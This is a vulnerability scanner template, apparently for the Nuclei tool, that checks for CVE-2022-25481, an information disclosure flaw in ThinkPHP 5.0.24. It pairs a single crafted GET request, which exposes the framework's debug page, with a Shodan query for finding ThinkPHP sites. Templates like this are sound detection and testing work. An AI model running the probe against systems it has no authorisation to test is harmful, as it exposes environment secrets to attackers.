id: CVE-2022-25481

info:
  name: ThinkPHP 5.0.24 - Information Disclosure
  author: caon
  severity: high
  description: |
    ThinkPHP Framework v5.0.24 was discovered to be configured without the PATHINFO parameter. This allows attackers to access all system environment parameters from index.php.
  reference:
    - https://github.com/Lyther/VulnDiscover/blob/master/Web/ThinkPHP_InfoLeak.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25481
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-25481
    cwe-id: CWE-668
  metadata:
    shodan-query: title:"ThinkPHP"
    verified: "true"
  tags: cve,cve2022,thinkphp,exposure,oss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?s=example'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "ThinkPHP"

      - type: word
        words:
          - "HttpException"
          - "TRACE"
        condition: or

      - type: status
        status:
          - 404